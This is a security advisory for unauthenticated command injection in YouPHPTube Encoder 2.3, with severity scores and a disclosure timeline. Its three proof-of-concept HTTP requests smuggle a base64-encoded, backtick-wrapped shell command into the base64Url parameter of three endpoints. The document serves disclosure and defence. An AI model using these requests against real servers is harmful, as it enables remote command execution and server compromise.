7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.974 High
EPSS
Percentile
99.9%
Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3 a plugin for providing encoder functionality in YouPHPTube. Specially crafted web requests can cause commands to be executed on the server. An attacker can send a web request with parameters containing specific parameter to trigger these vulnerabilities, potentially allowing exfiltration of the database or user credentials or even compromise the underlying operating system.
YouPHPTube Encoder 2.3
https://www.youphptube.com/
<https://github.com/YouPHPTube/YouPHPTube-Encoder/>
10.0 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CWE-78: Improper Neutralization of Special Elements used in an OS Command (βOS Command Injectionβ)
Multiple command injections have been found in YouPHPTube Encoder. A successful attack could allow an attacker to compromise the server.
The following URLs and parameters have been confirmed to suffer from command injections and could be exploited by unauthenticated attackers:
The parameter base64Url in /objects/getImage.php is vulnerable to a command injection attack:
GET /YouPHPTube-Encoder/objects/getImage.php?base64Url=YGVjaG8gMTIzIHwgdGVlIC1hIHRoaXNzeXN0ZW1oYXZlYmVlbmV4cGxvaXRlZDEyMzRg&format=png HTTP/1.1
Host: [HOSTNAME].com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[HOSTNAME].com/YouPHPTubeEncoder/objects/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
The parameter base64Url in /objects/getImageMP4.php is vulnerable to a command injection attack.
GET /YouPHPTube-Encoder/objects/getImageMP4.php?base64Url=YGVjaG8gMTIzIHwgdGVlIC1hIHRoaXNzeXN0ZW1oYXZlYmVlbmV4cGxvaXRlZDEyMzRg&format=jpg HTTP/1.1
Host: [HOSTNAME].com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[HOSTNAME].com/YouPHPTubeEncoder/objects/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
The parameter base64Url in /objects/getSpiritsFromVideo.php is vulnerable to a command injection attack.
GET /YouPHPTube-Encoder/objects/getSpiritsFromVideo.php?base64Url=YGVjaG8gMTIzIHwgdGVlIC1hIHRoaXNzeXN0ZW1oYXZlYmVlbmV4cGxvaXRlZDEyMzRg&format=jpg HTTP/1.1
Host: [HOSTNAME].com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[HOSTNAME].com/YouPHPTubeEncoder/objects/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
2019-10-16 - Vendor Disclosure
2019-10-16 - Vendor Patched
2019-10-17 - Public Release
7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.974 High
EPSS
Percentile
99.9%